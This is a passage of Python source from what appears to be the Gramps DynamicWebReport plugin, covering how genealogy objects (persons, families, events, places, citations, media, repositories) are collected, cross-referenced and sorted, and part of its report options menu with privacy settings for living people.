the dictionaries of objects\n\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\tif (not person): return\n\t\tperson_name = self.get_person_name(person)\n\t\tself.obj_dict[Person][person_handle] = [person_name, person.gramps_id, len(self.obj_dict[Person])]\n\t\t# Person events\n\t\tevt_ref_list = person.get_event_ref_list()\n\t\tif evt_ref_list:\n\t\t\tfor evt_ref in evt_ref_list:\n\t\t\t\tself._add_event(evt_ref.ref, Person, person_handle, evt_ref)\n\t\t# Person citations\n\t\tfor citation_handle in person.get_citation_list():\n\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Person name citations\n\t\tfor name in [person.get_primary_name()] + \\\n\t\t\t\t\t\tperson.get_alternate_names():\n\t\t\tfor citation_handle in name.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# LDS Ordinance citations\n\t\tfor lds_ord in person.get_lds_ord_list():\n\t\t\tfor citation_handle in lds_ord.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Attribute citations\n\t\tfor attr in person.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Person families\n\t\tfamily_handle_list = person.get_family_handle_list()\n\t\tif family_handle_list:\n\t\t\tfor family_handle in person.get_family_handle_list():\n\t\t\t\tself._add_family(family_handle, Person, person_handle)\n\t\t# Person media\n\t\tfor media_ref in person.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Person, person_handle, media_ref)\n\t\t# Association citations\n\t\tfor assoc in person.get_person_ref_list():\n\t\t\tfor citation_handle in assoc.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Addresses citations\n\t\tfor addr in person.get_address_list():\n\t\t\tfor citation_handle in addr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\n\n\tdef get_person_name(self, person):\n\t\t\"\"\"\n\t\tReturn a string containing the person's primary name in the name format chosen in the web report options\n\t\t@param: person -- person object from database\n\t\t\"\"\"\n\t\tname_format = self.options['name_format']\n\t\tprimary_name = person.get_primary_name()\n\t\tname = Name(primary_name)\n\t\tname.set_display_as(name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef _add_family(self, family_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd family_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Family][family_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the family is already added\n\t\tif (family_handle in self.obj_dict[Family]): return\n\t\t# Add family in the dictionaries of objects\n\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\tfamily_name = self.get_family_name(family)\n\t\tself.obj_dict[Family][family_handle] = [family_name, family.gramps_id, len(self.obj_dict[Family])]\n\t\t# Family events\n\t\tevt_ref_list = family.get_event_ref_list()\n\t\tif evt_ref_list:\n\t\t\tfor evt_ref in evt_ref_list:\n\t\t\t\tself._add_event(evt_ref.ref, Family, family_handle, evt_ref)\n\t\t# Family child references\n\t\tfor child_ref in family.get_child_ref_list():\n\t\t\tfor citation_handle in child_ref.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# LDS Ordinance citations\n\t\tfor lds_ord in family.get_lds_ord_list():\n\t\t\tfor citation_handle in lds_ord.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Attributes citations\n\t\tfor attr in family.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Family citations\n\t\tfor citation_handle in family.get_citation_list():\n\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Family media\n\t\tfor media_ref in family.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Family, family_handle, media_ref)\n\n\n\tdef get_family_name(self, family):\n\t\t\"\"\"\n\t\tReturn a string containing the name of the family (e.g. 'Family of John Doe and Jane Doe')\n\t\t@param: family -- family object from database\n\t\t\"\"\"\n\t\thusband_handle = family.get_father_handle()\n\t\tspouse_handle = family.get_mother_handle()\n\n\t\thusband = self.database.get_person_from_handle(husband_handle)\n\t\tspouse = self.database.get_person_from_handle(spouse_handle)\n\n\t\tif husband and spouse:\n\t\t\thusband_name = self.get_person_name(husband)\n\t\t\tspouse_name = self.get_person_name(spouse)\n\t\t\ttitle_str = _(\"Family of %(husband)s and %(spouse)s\") % {\n\t\t\t\t\"husband\": husband_name,\n\t\t\t\t\"spouse\": spouse_name}\n\t\telif husband:\n\t\t\thusband_name = self.get_person_name(husband)\n\t\t\t# Only the name of the husband is known\n\t\t\ttitle_str = _(\"Family of %(father)s\") % {\"father\": husband_name}\n\t\telif spouse:\n\t\t\tspouse_name = self.get_person_name(spouse)\n\t\t\t# Only the name of the wife is known\n\t\t\ttitle_str = _(\"Family of %(mother)s\") % {\"mother\": spouse_name}\n\t\telse:\n\t\t\ttitle_str = \"\"\n\n\t\treturn title_str\n\n\n\tdef _add_event(self, event_handle, bkref_class, bkref_handle, event_ref):\n\t\t\"\"\"\n\t\tAdd event_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Check if event reference already added\n\t\trefs = []\n\t\tif (event_handle in self.bkref_dict[Event]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[Event][event_handle]]\n\t\t\t# The event reference is already recorded\n\t\t\tif (event_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Event][event_handle].add((bkref_class, bkref_handle, event_ref))\n\t\t# Event reference attributes citations\n\t\tfor attr in event_ref.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Check if the event is already added\n\t\tif (event_handle in self.obj_dict[Event]): return\n\t\t# Add event in the dictionaries of objects\n\t\tevent = self.database.get_event_from_handle(event_handle)\n\t\tif (not event): return\n\t\tevent_name = str(event.get_type())\n\t\tevent_desc = event.get_description()\n\t\t# The event description can be Y on import from GEDCOM. See the\n\t\t# following quote from the GEDCOM spec: \"The occurrence of an event is\n\t\t# asserted by the presence of either a DATE tag and value or a PLACe tag\n\t\t# and value in the event structure. When neither the date value nor the\n\t\t# place value are known then a Y(es) value on the parent event tag line\n\t\t# is required to assert that the event happened.\"\"\n\t\tif not (event_desc == \"\" or event_desc is None or event_desc ==\"Y\"):\n\t\t\tevent_name = event_name + \": \" + event_desc\n\t\tself.obj_dict[Event][event_handle] = [event_name, event.gramps_id, len(self.obj_dict[Event])]\n\t\t# Event place\n\t\tplace_handle = event.get_place_handle()\n\t\tif (place_handle):\n\t\t\tself._add_place(place_handle, bkref_class, bkref_handle)\n\t\t# Event citations\n\t\tfor citation_handle in event.get_citation_list():\n\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Event attributes citations\n\t\tfor attr in event.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Event media\n\t\tfor media_ref in event.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, bkref_class, bkref_handle, media_ref)\n\n\n\tdef _add_place(self, place_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd place_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Place][place_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the place is already added\n\t\tif (place_handle in self.obj_dict[Place]): return\n\t\t# Add place in the dictionaries of objects\n\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\tif (DWR_VERSION_412):\n\t\t\tplace_name = _pd.display(self.database, place)\n\t\telse:\n\t\t\tplace_name = place.get_title()\n\t\tself.obj_dict[Place][place_handle] = [place_name, place.gramps_id, len(self.obj_dict[Place])]\n\n\t\tif (self.inc_places):\n\t\t\t# Place citations\n\t\t\tfor citation_handle in place.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Place, place_handle)\n\t\t\t# Place media\n\t\t\tfor media_ref in place.get_media_list():\n\t\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\t\tself._add_media(media_handle, Place, place_handle, media_ref)\n\n\n\tdef _add_source(self, source_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd source_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Source][source_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the source is already added\n\t\tif (source_handle in self.obj_dict[Source]): return\n\t\t# Add source in the dictionaries of objects\n\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\tsource_name = source.get_title()\n\t\tself.obj_dict[Source][source_handle] = [source_name, source.gramps_id, len(self.obj_dict[Source])]\n\t\t# Source repository\n\t\tif self.inc_repositories:\n\t\t\tfor repo_ref in source.get_reporef_list():\n\t\t\t\trepo_handle = repo_ref.get_reference_handle()\n\t\t\t\tself._add_repository(repo_handle, Source, source_handle, repo_ref)\n\t\t# Source media\n\t\tfor media_ref in source.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Source, source_handle, media_ref)\n\n\n\tdef _add_citation(self, citation_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd citation_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Citation][citation_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the citation is already added\n\t\tif (citation_handle in self.obj_dict[Citation]): return\n\t\t# Add citation in the dictionaries of objects\n\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\tcitation_name = citation.get_page() or \"\"\n\t\tsource_handle = citation.get_reference_handle()\n\t\tself.obj_dict[Citation][citation_handle] = [citation_name, citation.gramps_id, len(self.obj_dict[Citation])]\n\t\t# Citation source\n\t\tself._add_source(source_handle, Citation, citation_handle)\n\t\t# Citation media\n\t\tfor media_ref in citation.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Source, source_handle, media_ref)\n\n\n\tdef _add_media(self, media_handle, bkref_class, bkref_handle, media_ref):\n\t\t\"\"\"\n\t\tAdd media_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_gallery): return\n\t\t# Check if media reference already added\n\t\trefs = []\n\t\tif (media_handle in self.bkref_dict[MediaObject]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[MediaObject][media_handle]]\n\t\t\t# The media reference is already recorded\n\t\t\tif (media_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[MediaObject][media_handle].add((bkref_class, bkref_handle, media_ref))\n\t\t# Citations for media reference, media reference attributes\n\t\tcitation_list = media_ref.get_citation_list()\n\t\tfor attr in media_ref.get_attribute_list():\n\t\t\tcitation_list.extend(attr.get_citation_list())\n\t\tfor citation_handle in citation_list:\n\t\t\tself._add_citation(citation_handle, MediaObject, media_handle)\n\t\t# Check if the media is already added\n\t\tif (media_handle in self.obj_dict[MediaObject]): return\n\t\t# Add media in the dictionaries of objects\n\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\tmedia_name = \"Media\"\n\t\tself.obj_dict[MediaObject][media_handle] = [media_name, media.gramps_id, len(self.obj_dict[MediaObject])]\n\t\t# Citations for media, media attributes\n\t\tcitation_list = media.get_citation_list()\n\t\tfor attr in media.get_attribute_list():\n\t\t\tcitation_list.extend(attr.get_citation_list())\n\t\tfor citation_handle in citation_list:\n\t\t\tself._add_citation(citation_handle, MediaObject, media_handle)\n\n\n\tdef _add_repository(self, repo_handle, bkref_class, bkref_handle, repo_ref):\n\t\t\"\"\"\n\t\tAdd repo_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_repositories): return\n\t\t# Check if repository reference already added\n\t\trefs = []\n\t\tif (repo_handle in self.bkref_dict[Repository]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[Repository][repo_handle]]\n\t\t\t# The repository reference is already recorded\n\t\t\tif (repo_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Repository][repo_handle].add((bkref_class, bkref_handle, repo_ref))\n\t\t# Check if the repository is already added\n\t\tif (repo_handle in self.obj_dict[Repository]): return\n\t\t# Add repository in the dictionaries of objects\n\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\trepo_name = repo.name\n\t\tself.obj_dict[Repository][repo_handle] = [repo_name, repo.gramps_id, len(self.obj_dict[Repository])]\n\t\t# Addresses citations\n\t\tfor addr in repo.get_address_list():\n\t\t\tfor citation_handle in addr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Repository, repo_handle)\n\n\t\t\t\t\n\t##############################################################################################\n\t##############################################################################################\n\t#\n\t# Objects dictionaries sorting\n\t#\n\t##############################################################################################\n\t##############################################################################################\n\n\n\tdef _sort_obj_dict(self):\n\t\t\"\"\"\n\t\tSort the dictionaries of objects to be included in the reports.\n\t\tThe dictionaries are sorted by name.\n\t\tThe sorting is performed by modifying the index of the objects.\n\t\t\"\"\"\n\t\t\n\t\t# Sort persons\n\t\tsortkeys = {}\n\t\tobjs = list(self.obj_dict[Person].keys())\n\t\tfor handle in objs:\n\t\t\tsortkeys[handle] = self.get_person_name_sort_key(handle)\n\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\tfor (i, x) in enumerate(objs):\n\t\t\tself.obj_dict[Person][x][OBJDICT_INDEX] = i\n\t\t\t\n\t\t# Sort families\n\t\tsortkeys = {}\n\t\tobjs = list(self.obj_dict[Family].keys())\n\t\tfor handle in objs:\n\t\t\tsortkeys[handle] = self.get_family_name_sort_key(handle)\n\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\tfor (i, x) in enumerate(objs):\n\t\t\tself.obj_dict[Family][x][OBJDICT_INDEX] = i\n\n\t\t# Sort others\n\t\tfor cls in (Source, Repository, MediaObject, Place):\n\t\t\tobjs = list(self.obj_dict[cls].keys())\n\t\t\tsortkeys = {}\n\t\t\tfor handle in objs:\n\t\t\t\tsortkeys[handle] = SORT_KEY(self.obj_dict[cls][handle][OBJDICT_NAME])\n\t\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\t\tfor (i, x) in enumerate(objs):\n\t\t\t\tself.obj_dict[cls][x][OBJDICT_INDEX] = i\n\t\t\n\n\tdef get_person_name_sort_key(self, handle):\n\t\t\"\"\"\n\t\tReturn a sort key for a person\n\t\t\"\"\"\n\t\tperson = self.database.get_person_from_handle(handle)\n\t\tprimary_name = person.get_primary_name()\n\t\tsort_str = _nd.sort_string(primary_name)\n\t\treturn(SORT_KEY(sort_str))\n\t\t\n\t\t\n\tdef get_family_name_sort_key(self, handle):\n\t\t\"\"\"\n\t\tReturn a sort key for a family\n\t\t\"\"\"\n\t\tfamily = self.database.get_family_from_handle(handle)\n\t\thusband_handle = family.get_father_handle()\n\t\tspouse_handle = family.get_mother_handle()\n\n\t\thusband = self.database.get_person_from_handle(husband_handle)\n\t\tspouse = self.database.get_person_from_handle(spouse_handle)\n\n\t\tif husband and spouse:\n\t\t\tsort_key = self.get_person_name_sort_key(husband_handle) + SORT_KEY(\" \") + self.get_person_name_sort_key(spouse_handle)\n\t\telif husband:\n\t\t\tsort_key = self.get_person_name_sort_key(husband_handle)\n\t\telif spouse:\n\t\t\tsort_key = self.get_person_name_sort_key(spouse_handle)\n\t\telse:\n\t\t\tsort_key = SORT_KEY(\"\")\n\n\t\treturn(sort_key)\n\t\t\n\t\t\n\t\t\n\t\t\n##################################################################################################\n##################################################################################################\n#\n# DynamicWebReport Menu Options\n#\n##################################################################################################\n##################################################################################################\n\nclass DynamicWebOptions(MenuReportOptions):\n\t\"\"\"\n\tCreates the DynamicWebReport Menu Options\n\tDefines options and provides handling interface.\n\t\n\tMethods:\n\t- add_menu_options: called by Gramps to generate the options menu. It calls all the other methods \"__add_***_options\"\n\t- __add_***_options: One method for each tab of the options menu.\n\t- __***_changed: methods called when an option impacts other options\n\t\"\"\"\n\tdef __init__(self, name, dbase):\n\t\n\t\tself.__db = dbase #: Gramps database\n\t\t\n\t\t# The data below are used when some options change the behavior of other options. For example: a boolean option enables/disables another option. These data are used in the methods \"__***_changed\".\n\t\tself.__pid = None\n\t\tself.__filter = None\n\t\tself.__living = None\n\t\tself.__yearsafterdeath = None\n\t\t\n\t\t#: This help explains how Gramps note are modified in order to generate custom pages\n\t\tself.note_help = _(\n\t\t\t\"In this note, the following special words are processed:\\n\"\n\t\t\t\"__SEARCH_FORM__ is replaced by a search form.\\n\"\n\t\t\t\"__NB_INDIVIDUALS__ is replaced by the number of persons.\\n\"\n\t\t\t\"__NB_FAMILIES__ is replaced by the number of families.\\n\"\n\t\t\t\"__NB_MEDIA__ is replaced by the number of media objects.\\n\"\n\t\t\t\"__NB_SOURCES__ is replaced by the number of sources.\\n\"\n\t\t\t\"__NB_REPOSITORIES__ is replaced by the number of repositories.\\n\"\n\t\t\t\"__NB_PLACES__ is replaced by the number of places.\\n\"\n\t\t\t\"__MEDIA___ is replaced by the media with gramps ID .\\n\"\n\t\t\t\"__THUMB___ is replaced by the thumbnail of the media with gramps ID .\\n\"\n\t\t\t\"__EXPORT_DATE__ is replaced by the current date.\\n\"\n\t\t\t\"__GRAMPS_VERSION__ is replaced by the GRAMPS version.\\n\"\n\t\t\t\"__GRAMPS_HOMEPAGE__ is replaced by the GRAMPS homepage link.\\n\"\n\t\t\t\"URL starting with \\\"relative://relative.\\\" are replaced by the relative URL \\\"\\\".\\n\")\n\t\t\t\n\t\tMenuReportOptions.__init__(self, name, dbase)\n\n\t\t\n\tdef add_menu_options(self, menu):\n\t\t\"\"\"\n\t\tAdd options to the menu for the web site.\n\t\t\n\t\tIt calls all the other methods \"__add_***_options\" (one method for each tab of the options menu).\n\t\t\"\"\"\n\t\tself.__add_report_options(menu)\n\t\tself.__add_privacy_options(menu)\n\t\tself.__add_options_options(menu)\n\t\tself.__add_pages_advanced_options(menu)\n\t\tself.__add_pages_options(menu)\n\t\tself.__add_trees_options(menu)\n\t\tself.__add_custom_pages_options(menu)\n\t\tself.__add_select_pages_options(menu)\n\n\t\t\n\tdef __add_report_options(self, menu):\n\t\t\"\"\"\n\t\tOptions on the \"Report\" tab.\n\t\t\"\"\"\n\t\tcategory_name = _(\"Report\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tdbname = self.__db.get_dbname()\n\t\tdefault_dir = dbname + \"_\" + \"dynamicweb\"\n\t\ttarget = DestinationOption(_(\"Destination\"),\n\t\t\tos.path.join(config.get(\"paths.website-directory\"), default_dir))\n\t\ttarget.set_help(_(\"The destination directory for the web files\"))\n\t\ttarget.set_directory_entry(True)\n\t\taddopt(\"target\", target)\n\n\t\tself.__archive = BooleanOption(_('Store web pages in archive'), False)\n\t\tself.__archive.set_help(_(\"Whether to create an archive file (in ZIP or TGZ format) containing the web site\"))\n\t\taddopt(\"archive\", self.__archive)\n\t\tself.__archive.connect(\"value-changed\", self.__archive_changed)\n\n\t\tself.__archive_file = DestinationOption(_(\"Archive file\"),\n\t\t\tos.path.join(config.get(\"paths.website-directory\"), default_dir, \"archive.zip\"))\n\t\tself.__archive_file.set_help(_(\"The archive file name (with \\\".zip\\\" or \\\".tgz\\\" extension)\"))\n\t\tself.__archive_file.set_directory_entry(False)\n\t\taddopt(\"archive_file\", self.__archive_file)\n\n\t\tself.__archive_changed()\n\n\t\ttitle = StringOption(_(\"Web site title\"), _(\"My Family Tree\"))\n\t\ttitle.set_help(_(\"The title of the web site\"))\n\t\taddopt(\"title\", title)\n\n\t\tself.__filter = FilterOption(_(\"Filter\"), 0)\n\t\tself.__filter.set_help(\n\t\t\t _(\"Select filter to restrict people that appear on web site\"))\n\t\taddopt(\"filter\", self.__filter)\n\t\tself.__filter.connect(\"value-changed\", self.__filter_changed)\n\n\t\tself.__pid = PersonOption(_(\"Filter Person\"))\n\t\tself.__pid.set_help(_(\"The center person for the filter\"))\n\t\taddopt(\"pid\", self.__pid)\n\t\tself.__pid.connect(\"value-changed\", self.__pid_changed)\n\n\t\tself.__pid_changed()\n\n\t\t# We must figure out the value of the first option before we can create the EnumeratedListOption\n\t\tfmt_list = _nd.get_name_format()\n\t\tdefaultnum = _nd.get_default_format()\n\t\tdefault = 0\n\t\tfor ind, val in enumerate(fmt_list):\n\t\t\tif val[0] == defaultnum:\n\t\t\t\tdefault = ind\n\t\t\t\tbreak\n\t\tname_format = EnumeratedListOption(_(\"Name format\"), fmt_list[default][0])\n\t\tfor num, name, fmt_str, act in fmt_list:\n\t\t\tname_format.add_item(num, name)\n\t\tname_format.set_help(_(\"Select the format to display the complete names\"))\n\t\taddopt(\"name_format\", name_format)\n\t\tshort_name_format = EnumeratedListOption(_(\"Name format (short)\"), fmt_list[default][0])\n\t\tfor num, name, fmt_str, act in fmt_list:\n\t\t\tshort_name_format.add_item(num, name)\n\t\tshort_name_format.set_help(_(\"Select the format to display a shorter version of the names\"))\n\t\taddopt(\"short_name_format\", short_name_format)\n\t\t\n\t\ttemplate = EnumeratedListOption(_(\"Web site template\"), 0)\n\t\tfor (i, (directory, name)) in enumerate(WEB_TEMPLATE_LIST):\n\t\t\ttemplate.add_item(i, name)\n\t\ttemplate.set_help(_(\"Select the template of the web site\"))\n\t\taddopt(\"template\", template)\n\n\t\tcpright = EnumeratedListOption(_(\"Copyright\"), 0)\n\t\tfor index, copt in enumerate(_COPY_OPTIONS):\n\t\t\tcpright.add_item(index, copt)\n\t\tcpright.set_help( _(\"The copyright to be used for the web files\"))\n\t\taddopt(\"copyright\", cpright)\n\n\n\tdef __add_privacy_options(self, menu):\n\t\t\"\"\"\n\t\tOptions on the \"Privacy\" tab.\n\t\t\"\"\"\n\t\tcategory_name = _(\"Privacy\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tincpriv = BooleanOption(_(\"Include records marked private\"), False)\n\t\tincpriv.set_help(_(\"Whether to include private objects\"))\n\t\taddopt(\"incpriv\", incpriv)\n\n\t\tinc_notes = BooleanOption(_(\"Export notes\"), True)\n\t\tinc_notes.set_help(_(\"Whether to export notes in the web pages\"))\n\t\taddopt(\"inc_notes\", inc_notes)\n\n\t\tinc_sources = BooleanOption(_(\"Export sources\"), True)\n\t\tinc_sources.set_help(_(\"Whether to export sources and citations in the web pages\"))\n\t\taddopt(\"inc_sources\", inc_sources)\n\n\t\tinc_addresses = BooleanOption(_(\"Export addresses\"), True)\n\t\tinc_addresses.set_help(_(\"Whether to export addresses in the web pages\"))\n\t\taddopt(\"inc_addresses\", inc_addresses)\n\n\t\tself.__living = EnumeratedListOption(_(\"Living People\"),\n\t\t\t\t\t\t\t\t\t\t\t LivingProxyDb.MODE_EXCLUDE_ALL)\n\t\tself.__living.add_item(LivingProxyDb.MODE_EXCLUDE_ALL,\n\t\t\t\t\t\t\t _(\"Exclude\"))\n\t\tself.__living.add_item(LivingProxyDb.MODE_INCLUDE_LAST_NAME_ONLY,\n\t\t\t\t\t\t\t _(\"Include Last Name Only\"))\n\t\tself.__living.add_item(LivingProxyDb.MODE_INCLUDE_FULL_NAME_ONLY,\n\t\t\t\t\t\t\t _(\"Include Full Name Only\"))\n\t\tself.__living.add_item(INCLUDE_LIVING_VALUE,\n\t\t\t\t\t\t\t _(\"Include\"))\n\t\tself.__living.set_help(_(\"How to handle living people\"))\n\t\taddopt(\"living\", self.__living)\n\t\tself.__living.connect(\"value-changed\", self.__living_changed)\n\n\t\tself.__yearsafterdeath = NumberOption(_(\"Years from death to consider \"\n\t\t\t\t\t\t\t\t\t\t\t\t \"living\"), 30, 0, 100)\n\t\tself.__yearsafterdeath.set_help(_(\"This allows you to restrict \"\n\t\t\t\t\t\t\t\t\t\t \"information on people who have not \"\n\t\t\t\t\t\t\t\t\t\t \"been dead for very long\"))\n\n\t\taddopt(\"yearsafterdeath\", self.__yearsafterdeath)\n\n\t\tself.__living_changed()\n\n\n\tdef __add_options_options(self, menu):\n\t\tcategory_name = _(\"Options\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tinc_repositories = BooleanOption(_('Include repository pages'), False)\n\t\tinc_repositories.set_help(_('Whether or not to include the Repository Pages.'))\n\t\taddopt(\"inc_repositories\", inc_repositories)\n\n\t\tinc_gallery = BooleanOption(_(\"Include images and media objects\"), True)\n\t\tinc_gallery.set_help(_(\"Whether to include a media objects in the web pages\"))\n\t\taddopt(\"inc_gallery\", inc_gallery)\n\n\t\tcopy_media = BooleanOption(_(\"Copy images and media objects\"), True)\n\t\tcopy_media.set_help(_(\"Whether to make a copy of the media objects.\"\n\t\t\t\" When the objects are not copied, they are referenced by their relative path name\"))\n\t\taddopt(\"copy_media\", copy_media)\n\n\t\tprint_notes_type = BooleanOption(_(\"Print the notes type\"), True)\n\t\tprint_notes_type.set_help(_(\"Whether to print the notes type in the notes text\"))\n\t\taddopt(\"print_notes_type\", print_notes_type)\n\n\t\tself.__inc_places = BooleanOption(_(\"Print place pages\"), True)\n\t\tself.__inc_places.set_help(_(\"Whether to show pages for the places\"))\n\t\taddopt(\"inc_places\", self.__inc_places)\n\t\tself.__inc_places.connect(\"value-changed\", self.__placemap_options_changed)\n\n\t\tself.__placemappages = BooleanOption(_(\"Include Place map on Place Pages\"), False)\n\t\tself.__placemappages.set_help(_(\n\t\t\t\"Whether to include a place map on the Place Pages, \"\n\t\t\t\"where Latitude/ Longitude are available.\"))\n\t\tself.__placemappages.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"placemappages\", self.__placemappages)\n\n\t\tself.__familymappages = BooleanOption(_(\n\t\t\t\"Include Family Map Pages with \"\n\t\t\t\"all places shown on the map\"), False)\n\t\tself.__familymappages.set_help(_(\n\t\t\t\"Whether or not to add an individual page map \"\n\t\t\t\"showing all the places on this page. \"\n\t\t\t\"This will allow you to see how your family \"\n\t\t\t\"traveled around the country.\"))\n\t\tself.__familymappages.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"familymappages\", self.__familymappages)\n\n\t\tmapopts = [\n\t\t\t[_(\"Google\"), \"Google\"],\n\t\t\t[_(\"OpenStreetMap\"), \"OpenStreetMap\"]\n\t\t]\n\t\tself.__mapservice = EnumeratedListOption(_(\"Map Service\"), mapopts[0][1])\n\t\tfor trans, opt in mapopts:\n\t\t\tself.__mapservice.add_item(opt, trans)\n\t\tself.__mapservice.set_help(_(\"Choose your choice of map service for creating the Place Map Pages\"))\n\t\tself.__mapservice.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"mapservice\", self.__mapservice)\n\n\t\tself.__placemap_options_changed()\n\n\n\tdef __add_pages_advanced_options(self, menu):\n\t\tcategory_name = _(\"Advanced\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tencoding = EnumeratedListOption(_('Character set encoding'), _CHARACTER_SETS[0][1])\n\t\tfor eopt in _CHARACTER_SETS:\n\t\t\tencoding.add_item(eopt[1], eopt[0])\n\t\tencoding.set_help(_(\"The encoding to be used for the web files\"))\n\t\taddopt(\"encoding\", encoding)\n\n\t\tinc_families = BooleanOption(_(\"Include family pages\"), False)\n\t\tinc_families.set_help(_(\"Whether or not to include family pages\"))\n\t\taddopt(\"inc_families\", inc_families)\n\n\t\tinc_events = BooleanOption(_('Include event pages'), False)\n\t\tinc_events.set_help(_('Add a complete events list and relevant pages or not'))\n\t\taddopt(\"inc_events\", inc_events)\n\t\tinc_events.set_available(False)\n\n\t\tshowbirth = BooleanOption(_(\"Include a column for birth dates on the index pages\"), True)\n\t\tshowbirth.set_help(_('Whether to include a birth column'))\n\t\taddopt(\"showbirth\", showbirth)\n\n\t\tshowdeath = BooleanOption(_(\"Include a column for death dates on the index pages\"), False)\n\t\tshowdeath.set_help(_('Whether to include a death column'))\n\t\taddopt(\"showdeath\", showdeath)\n\n\t\tshowmarriage = BooleanOption(_(\"Include a column for marriage dates on the index pages\"), False)\n\t\tshowmarriage.set_help(_('Whether to include a marriage column'))\n\t\taddopt(\"showmarriage\", showmarriage)\n\n\t\tshowpartner = BooleanOption(_(\"Include a column for partners on the index pages\"), False)\n\t\tshowpartner.set_help(_('Whether to include a partners column'))\n\t\taddopt(\"showpartner\", showpartner)\n\n\t\tshowparents = BooleanOption(_(\"Include a column for parents on the index pages\"), False)\n\t\tshowparents.set_help(_('Whether to include a parents column'))\n\t\taddopt(\"showparents\", showparents)\n\n\t\tshowallsiblings = BooleanOption(_(\"Include half and/ or step-siblings on the individual pages\"), False)\n\t\tshowallsiblings.set_help(_( \"Whether to include half and/ or step-siblings with the parents and siblings\"))\n\t\taddopt('showallsiblings', showallsiblings)\n\n\t\tbirthorder = BooleanOption(_('Sort all children in birth order'), False)\n\t\tbirthorder.set_help(_('Whether to display children in birth order or in entry order?'))\n\t\taddopt(\"birthorder\", birthorder)\n\n\t\tbkref_type = BooleanOption(_('Include references in indexes'), False)\n\t\tbkref_type.set_help(_('Whether to include the references to the items in the index pages. For example, in the media index page, the names of the individuals, families, places, sources that reference the media.'))\n\t\taddopt(\"bkref_type\", 